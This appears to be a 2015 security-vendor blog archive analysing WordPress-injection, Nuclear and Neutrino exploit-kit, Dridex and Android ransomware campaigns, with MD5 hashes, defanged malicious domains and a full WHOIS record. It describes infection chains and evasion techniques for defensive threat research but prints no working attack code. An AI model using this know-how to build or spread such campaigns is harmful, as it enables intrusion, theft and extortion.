Friday, September 25, 2015

Compromised WordPress Campaign - Spyware Edition


The Zscaler security research team started investigating multiple WordPress related security events earlier this month and came across a new widespread compromised WordPress campaign leading to the download of unwanted applications. This has been briefly covered by dynamoo and has been reported by some users on official WordPress forums.

During our research, we discovered that this campaign started in the first week of August, 2015 and has been fairly active since then resulting in over 20,000 security events to date from over 2,000 web pages. Majority of the WordPress sites affected by this campaign are running latest version 4.3.1 but the compromise could have occurred prior to the update.

Figure 1: August 2015 WordPress Campaign hits

Figure 2: September 2015 WordPress Campaign hits

Infection Cycle

The infection starts when a user visits a compromised WordPress site. The compromised pages will have injected JavaScript shown below:

Figure 3: Injected malicious JavaScript code

The deobfuscated JavaScript code contains an iframe to the malicious server location:

Figure 4: Deobfuscated JavaScript containing the iframe

Although the target domains varied across the transactions that we saw, the associated server IP address has remained the same.

Target domains seen

The IP Address associated with these domains is hosted in Latvia through a VPS hosting provider.

The injected iframe loads additional JavaScript that gathers information such as current system timestamp, timezone, and presence of Adobe Flash Player.

Figure 5: User system information gathering script

Figure 6: Function to check the presence of Flash Plugin and version information

The collected information is relayed back to the same server via a HTTP GET request. This is followed by a series of redirects leading to download of spyware or potentially unwanted applications (PUA) masquerading as legitimate applications.

Figure 7: Redirects from Latvia VPS server leading to PUA download

Fake Flash Player - Win32.InstallCore

In one of the cases, we observed the user is prompted to update the Flash Player as seen below:

Figure 8: Out of date Flash Player warning
The page prompts the user to update or install a new flash player update. Regardless of the option the user selects, a fake Adobe Flash Player application is downloaded.

FileName : Adobe Flash Player.exe
MD5 : fa75abf137224fc2c60b9b3c35c80a5e

This file is a .NET Compiled executable which downloads and executes another setup file named FlashSetup.exe.

FileName : Flash Setup.exe
MD5: 87234af45b30740309c8bffcdf2167dc

Figure 9: Fake Flash Player download
The downloaded file flashsetup.exe is a variant of Potentially Unwanted Application Win32.InstallCore. During the installation of the Adobe Flash Player, several other websites offering other unwanted scareware applications are displayed. One such case where the spyware installer prompts the user to download and install Windows 7 PC Repair tool is shown below:
Figure 8: Scareware Windows 7 Repair utility

Figure 9: Download from third party sites & adware traffic from PUA

Once the spyware installation is complete, the user is redirected to the legitimate Adobe page indicating that the installation was not successful prompting the user to start over. If the user chooses to start over the installation, Adobe Flash Player will be installed from the genuine Adobe site.

Figure 10: User redirected to legitimate Adobe Flash Player

Fake MediaDownloader update - Win32.DownloadAssistant

In another case, the webpage prompts the user with a fake MediaDownloader software update which is a variant of PUA Win32.DownloadAssistant.

FileName: Setup.exe
MD5: a885f33c308721831498a2ac581bd91c
Figure 11: Fake MediaDownloader Update

The end result is same where a potentially unwanted application is downloaded and installed on the victim machine. These applications have the capability to download additional malicious or unwanted applications.

We also saw instances of fake web browser plugins being downloaded and installed. Below is an example of a Google Chrome Plugin - NewTabTV plus.

Figure 12: Fake Google Chrome Plugin download

The compromised sites involved in this campaign are distributed worldwide and not limited to one particular region.

Figure 13: Geo distribution of the compromised WordPress sites - September 2015


WordPress, being one of the most popular Content Management Systems & Blogging platform, remains an attractive target for cybercriminals. Unlike previous campaigns involving Malware Authors and Exploit Kit operators, the end payload getting served in this campaign involves spyware and potentially unwanted applications. These applications may seem innocuous but can facilitate malvertising based attacks through unsolicited advertisements.

Zscaler ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.

Analysis by Jithin Nair and Sameer Patil

Wednesday, September 23, 2015

An Update on Nuclear (Reverse) Engineering


Although Angler continues to be the leading exploit kit, Nuclear is a significant threat to web surfers and seems to have been very active lately. ThreatLabZ recently encountered a Nuclear campaign originating from a variety of compromised sites. These compromises continue the trend of WordPress sites serving malcode, and in this case included the web-presence of a UK-based healthcare organization.

Example of recent Nuclear landing page to exploit cycle

The execution flow of this campaign is typical: an infected site includes an embedded iframe that loads the exploit kit landing page. The landing page checks the browser family and version and tests the available Flash version before choosing one of several exploit payloads. From here, multiple possible payloads may be downloaded, particularly Fareit Infostealer Trojan and Troldesh Ransomware Trojan.

Nuclear Landing

As covered recently, WordPress continues to be one of the most effective traffic sources for exploit kits. However, the majority of traffic we have seen does not feature the visitorTracker component, but merely includes a hidden iframe in the footer of the WordPress page.

The malicious iframe is preceded by a large number of blank lines

The iframe loads the landing page, which features obfuscated JavaScript and random-looking text blocks. It turns out that some of the random looking text blocks are actually obfuscated components that the JavaScript eventually deobfuscates and executes.

Lines 7 and 9 are overlaid with the script invocations that decode the HTML blocks

Nuclear Exploit Payloads

The landing pages we evaluated led to two possible Flash exploits as well as one Internet Explorer exploit. Specifically, we saw CVE-2015-5122 and CVE-2015-5560 exploits for Flash, and a highly obfuscated CVE-2014-6332 exploit for IE.

The first Flash payload stage checks Flash Player version and prepares the appropriate exploit

As noted by Kafeine, Nuclear has integrated the same Diffie-Hellman Angler first pioneered, only now it is implemented in Flash to protect the CVE-2015-5560 payload. This campaign also features an XTEA function with modified constants.

A Diffie-Hellman key exchange implementation is used to protect the new Flash payload

Besides making reverse engineers lives harder, the authors have also decided to include some friendly shoutouts to those analyzing their code. In the case of the featured Flash payloads, the string "fuckAV" is used as a special constant.

This function returns an XOR key when "fuckAV" is supplied as a parameter

Nuclear Fallout

Once the browser is exploited, Nuclear first drops a Fareit payload. Fareit is an infostealer, and as can be seen in the strings below, is looking to steal user credentials for multiple applications and websites as well as BitCoin wallet information.

A sample of the files and paths Fareit checks for user credentials

While stealing users information, Fareit attempts to hide its command and control communication by sending its check-in request in the midst of a batch of HTTP requests to innocuous looking websites.

After checking connectivity on, multiple POSTs are performed

In addition to the Fareit payload, a Troldesh ransomware payload was also seen. Troldesh is yet another in the line of ransomware families that encrypt user files and attempt to extract a ransom payments in exchange for decryption keys. This campaign is using the email addresses files100005(at) and files100006(at) and the Tor address a4yhexpmth2ldj3v.onion.

Troldesh bundles a Tor proxy to protect its communication

Although they might prefer to infect the machines of non-analysts, the Troldesh author does take the opportunity to greet their reverse engineer friends. This message is less aggressive than the greeting in the Nuclear flash payload.

Thanks, but I don't drink coffee!


While Nuclear may not be the exploit kit that regularly debuts the latest advances, the authors certainly make an effort to keep up with new exploits and new obfuscation techniques. ThreatLabZ will continue to monitor Nuclear (and Fareit and Troldesh) for any new developments or greetings.



Thursday, September 3, 2015

More Adult Themed Android Ransomware

During the course of our daily malware hunt, we came across a new mobile ransomware variant that leverages pornography to lure victims into downloading and installing it. We'd previously blogged about similar Android malware.

App Name: Adult Player
MD5: 6ed2451d1300ff75e793744bb3563638
Package Name: content.mercenary.chiffon

This ransomware acts as a porn app named "Adult Player" and lures victims who assume it is a pornographic video player. When the victim starts using it, the app silently takes a photo of the victim, which is then displayed on the ransomware screen, along with the ransom message. The app demands a ransom of 500 USD.

Admin Activation:
Upon opening the app, it asks for admin rights as shown below :
Admin privilege
After clicking "Activate", the app shows a fake update page but nothing really happens in terms of an update.

Fake update page

The malware then loads another APK named test.apk from it's local storage using a technique referred to as a reflection attack - /data/data/content.mercenary.chiffon/app_dex/test.apk.

Reflection is the ability of a program to examine and modify the behavior of an object at run time, instead of compile time.

APK stored in app's local storage
The specific reason for using reflection remains unknown but one reason could be to evade static analysis and detection.

Loading Test.apk

Personalized Ransom Screen:
The ransomware checks whether front camera is available or not. If available, it clicks photo of the victim while he/she is using the app and displays the image on ransom page.

Camera check
The majority of the malicious activities are then conducted by the newly loaded test.apk. The malware connects to the following hard-coded domains contained in the app:
  • hxxp://directavsecurity[.]com
  • hxxp://avsecurityorbit[.]com
  • hxxp://protectforavno[.]net
  • hxxp://trustedsecurityav[.]net
Hard-coded Domains
The malware then sends following details that includes victim's mobile device and operating system information to the remote server:
Data sent in requests

Ultimately, the malware receives a custom ransom page upon run time in a multi-encoded response from the aforementioned servers.

Decoded Ransom Message
Once the response is received, the ransomware locks the phone and displays the following ransom screen.
Ransom Page 1 (User Image Displayed Here)

Ransom Page 2

The ransom screen is designed to stay persistent even at reboot. It does not allow the user to operate the device and keeps the screen active with ransom message.

Broadcast Receiver acting on particular events

Preventing device from sleeping

More variants:
We also encountered additional apps belonging to this ransomware family and exhibiting similar functionality.

Sample MD5s:

  • ecd8c9eeae86c0d7d3c433e887fd5d3a
  • b544785176ed8152671bac94a18ca9d0
  • 9c731690985ce7c13ca9b25b9139d6a3

The ransomware is designed to stay stagnant on screen and does not allow the the victim to uninstall it. Rebooting the device does not work in such cases as ransomware app becomes active immediately after reboot, which leaves no scope for the victim to get into device "settings" and uninstall the ransomware.

In such scenarios, it can be removed by using the following steps:

  1. Boot device into safe mode (Please note that entering "safe mode" varies depending on your device). Safe mode boots the device with default settings without running third party apps.
  2. Uninstalling ransomware from device requires you to first remove administrator privilege. To do the same, go to Settings --> Security --> Device Administrator and select ransomware app, then deactivate.
  3. Once this is done, you can go to Settings --> Apps --> Uninstall ransomware app.

To avoid being victim of such ransomware, it is always best to download apps only from trusted app stores, such as Google Play. This can be enforced by unchecking the option of "Unknown Sources" under the "Security" settings of your device.

Monday, August 24, 2015

Signed Dridex Campaign


Malware authors use various means to make their malware look similar to legitimate software. One such approach involves signing a malware sample with a digital certificate. Recently we saw Dridex malware authors using this technique while reviewing the samples in our Cloud Sandbox. Dridex is a banking Trojan which typically arrives to a system via malicious spam email with a Microsoft Office file as an attachment. These files will have embedded macros that lead to the download and installation of the Dridex Trojan. Dridex then attempts to steal the victim's banking credentials and system information.

Signed Dridex campaign

Here we came across one malicious attachment with an encrypted macro that downloads signed Dridex samples from[.]php. This Dridex sample is packed using a custom packer, which is is compiled with .NET. The current Dridex is signed with a certificate that is issued to Private Person Parobii Yuri Romanovich. This certificate as been specially created for spreading the Dridex malware.

We also saw the following signer information in the certificates used for signing the Dridex executables:
  • AVTOZVIT Scientific Production Private Company
  • Private Person Parobii Yuri Romanovich
The certificates were all issued by COMODO and we observed the following URLs serving the signed Dridex malware:
  • [.] php
  • [.] php
  • [.] php
  • [.] php
  • [.] php
  • [.] php
  • [.] php
Below are the Dridex samples served from the aformentioned URLs. All tof he samples are packed with the same .NET packer mentioned above:
  • 5CA1DBA1C72AC999E221DE98BBC584C4
  • 9E73E0C4B92253C5F8B6648F29B28B5B
  • CD243B30B9BBD682C082CFEFDBF79ACD
  • E578618F2D38FC251D52D1366144404F
  • 5F907702CE229937955B4DCE92EC4575
  • 0BBC8CD08E9958ACDE0519A2B2840CD7
  • 9D1D0632329F04D8B1EC21AFF4CE6493
  • 32230D747829DCF77841F594AA54915A
  • 8F1A9A9830FF02C5C2BA4C17DFE8B09D
  • 00DCA835BB93708797A053A3B540DB16
  • 393E2145F4C3E9B5697A2AAEB25AA8D3
  • 1992170FDC642D4A99A7BC82BA82FA31
  • 9261B8EAF1DA3D9CFF522875A7198667
  • FB67C85F3F42D3E48B9E7B7637D30858
  • E578618F2D38FC251D52D1366144404F
Dridex Packer:
The Dridex sample is embedded in the resource section of the packer. After unpacking, it drops a Borland Delphi executable file. The following is the snapshot of encrypted resource section:

Encrypted Resource Section
Dridex Activity:
The current Dridex sample tries to connect to different IPs included in the config file. The config file for the sample is embedded in the sample itself. In the config file we observed a botnet ID and list of  C&C servers. Below is a snapshot of config file:

Configuration file
Dridex collects and sends the following system information to one of the C&C mentioned in the config file:
  • Computer Name
  • User Name
  • Windows Version
  • Botnet ID
Information sent to the server
Below is the complete list of C&Cs it tries to connect.


The use of a legitimate certificate in signing malware executables to evade security detection is not new but is still very effective. The malware author aims to exploit the Code-Signing Certificate based whitelisting approach by signing their samples. Zscaler ThreatlabZ is actively monitoring these signed malware campaigns and ensuring coverage for our customers.

Analysis by Tarun Dewan and Nirmal Singh

Thursday, August 20, 2015

Neutrino Campaign Leveraging WordPress, Flash for CryptoWall


Neutrino Exploit Kit (EK) appeared on the scene around March of 2013 and continues to remain active and incorporate new exploits. In the beginning of July, Neutrino reportedly incorporated the HackingTeam 0day (CVE-2015-5119), and in the past few days we've seen a massive uptick in the use of the kit. The cause for this uptick appears due to widespread WordPress site compromises.

ThreatLabZ started seeing a new campaign where WordPress sites running version 4.2 and lower were compromised, and the image below illustrates the components involved in this campaign.

Fig 1. Complete Neutrino WordPress campaign

In analyzing the infection cycle, there are multiple recent changes in the Neutrino code, some that are normally characteristics of Angler Exploit Kit, but others that remain unique to Neutrino.

WordPress Compromises

Similar to Angler Exploit Kit, the new wave of Neutrino is targeting outdated versions of WordPress. In fact, we have seen over 2600 unique WordPress sites being used in this campaign where more than 4200 distinct pages have been logged with dynamic iframe injection in the last month. As mentioned, all the targeted websites were running WordPress version 4.2 and lower.

Fig 2. Event timeline overview

The goal of this campaign is to completely and fully compromise the site, which includes adding a webshell, harvesting credentials, and finally injecting an iframe that loads a Neutrino landing page. The iframe is injected into the compromised site immediately after the BODY tag, and is almost identical to recent Angler samples. Compare these recent Neutrino and Angler samples below.

Fig 3. Neutrino on the left, Angler on the right

The code specifically targets Internet Explorer, so those using other browsers won't be served the iframe, and a cookie is used to prevent serving the iframe multiple times to the same victim.

The actual Neutrino landing pages are retrieved on the backend through the injected php code, a sample of which is below:

Fig 4. Injected php code

Note the base64 encoded value boxed in red above; this decodes to the URL below, where X, Y, and Z are integers:
This URL is used to retrieve an updated landing page URL, and we've noted that the URLs change very frequently. Additionally, the primary IP hosting the majority of landing page domains is '' which is owned by We reached out to them via email briefly explaining what we were seeing and received no response.

Neutrino Landing Page

The landing page has been updated and contains some JavaScript that only declares variables, and then a flash loader:

Fig 5. Neutrino landing page

If flash isn't installed on the victim machine, an old flash cab is pushed to the user prior to serving the malicious SWF. Note the departure from using base64 encoded data blobs, or really using very much code at all on the landing page.

Neutrino SWF

Past versions of the Neutrino SWF contained multiple exploit payloads encrypted via RC4. Examining this SWF shows that things have apparently changed as the structure is very different:

Fig 6. SWF structure

Taking a look at the code shows that instead of RC4, there is a decode function that uses the input of one binary data blob to decode a second binary blob; the decoded data reveals a second SWF:

Fig 7. Decode function for embedded SWF

Detection results for the SWF are very poor with only one vendor detecting it:

Fig 8. Poor detection results on SWF

Carving out the embedded SWF and analyzing it shows a much more familiar structure for Neutrino, with some additional enhancements. Notably similar is the use of multiple embedded binary blobs that are RC4 encrypted:

Fig 9. Binary data inside embedded SWF

Fig 10. Script data inside embedded SWF - characteristic of Neutrino

These binary blobs contain multiple payloads, and this has been analyzed and documented in the past, notably by Kafeine and Dennis O'Brien on Malwageddon. However, unlike past Neutrino SWFs, the RC4 keys are no longer in cleartext and decoding them requires tracing through multiple function calls. The ActionScript structure is still very recognizable though:

Fig 11. Decoder for one binarydata 'exploitWrapper' blob
Detection on the embedded SWF is also quite poor.
Fig 12. Embedded SWF VT detection


Successful exploitation of a victim leads to an encrypted executable download. The binary is decrypted and begins beaconing almost immediately:

Fig 13. Initial beacon summary
Fig 14. Full beacon/response sample

Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple minutes later we see the all too familiar 'HELP_DECRYPT' page and see connections out to the payment servers:

Fig 15. Payment server connections

Fig 16. CryptoWall 3.0 HELP_DECRYPT page

To read more about CryptoWall, please see our previous writeup here.

Campaign Information

As stated, the primary IP for the observed Neutrino landing pages is '' which is owned by Many of the domains pointing to that IP utilize 'xyz', 'ga', 'gq', and 'ml' TLDs. Taking a look at the whois data for some of these domains, a common attribute seems to be the name 'Max Vlapet' for .XYZ domains. Full whois domain sample for completeness:


Domain Name: MOHGROUP.XYZ 
Domain ID: D9543161-CNIC 
WHOIS Server: 
Referral URL: 
Updated Date: 2015-08-18T08:34:04.0Z 
Creation Date: 2015-08-18T08:34:03.0Z 
Registry Expiry Date: 2016-08-18T23:59:59.0Z 
Sponsoring Registrar: AlpNames Limited 
Sponsoring Registrar IANA ID: 1857 
Domain Status: clientTransferProhibited 
Domain Status: serverTransferProhibited 
Domain Status: addPeriod 
Registrant ID: ALP_44867689 
Registrant Name: Max Vlapet 
Registrant Organization: N/A 
Registrant Street: Mausoleum str, pl.13 
Registrant City: Moscow 
Registrant State/Province: Moscow 
Registrant Postal Code: 123006 
Registrant Country: RU 
Registrant Phone: +7.4959826524 
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: 
Admin ID: ALP_44867689 
Admin Name: Max Vlapet 
Admin Organization: N/A 
Admin Street: Mausoleum str, pl.13 
Admin City: Moscow 
Admin State/Province: Moscow 
Admin Postal Code: 123006 
Admin Country: RU 
Admin Phone: +7.4959826524 
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext: 
Admin Email: 
Tech ID: ALP_44867689 
Tech Name: Max Vlapet 
Tech Organization: N/A 
Tech Street: Mausoleum str, pl.13 
Tech City: Moscow 
Tech State/Province: Moscow 
Tech Postal Code: 123006 
Tech Country: RU 
Tech Phone: +7.4959826524 
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: 
Name Server: NS2.MOHGROUP.XYZ 
Name Server: NS1.MOHGROUP.XYZ 
DNSSEC: unsigned 
Billing ID: ALP_44867689 
Billing Name: Max Vlapet 
Billing Organization: N/A 
Billing Street: Mausoleum str, pl.13 
Billing City: Moscow 
Billing State/Province: Moscow 
Billing Postal Code: 123006 
Billing Country: RU 
Billing Phone: +7.4959826524 
Billing Phone Ext: 
Billing Fax: 
Billing Fax Ext: 
Billing Email: 
>>> Last update of WHOIS database: 2015-08-19T00:44:12.0Z <<< 

Unfortunately, very little information is available for the other TLDs in use. The backend IP serving new landing page URLs is registered to a company called 'VDS INSIDE' located in Ukraine.

A dump of the 700+ malicious domains and/or landing pages we've collected is on pastebin:


WordPress, being a widely popular and free Content Management System (CMS), remains one of the most attractive targets for cyber criminals.  WordPress compromises are not new, but this campaign shows an interesting underground nexus starting with backdoored WordPress sites, a Neutrino Exploit Kit-controlled server, and the highly effective CryptoWall ransomware. This campaign also reconfirms that Neutrino Exploit Kit activity is on the rise and is still a major player in the exploit kit arena.

ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.


Special thanks to Dhruval Gandhi for profiling compromised WordPress sites

Write-up by: John Mancuso, Deepen Desai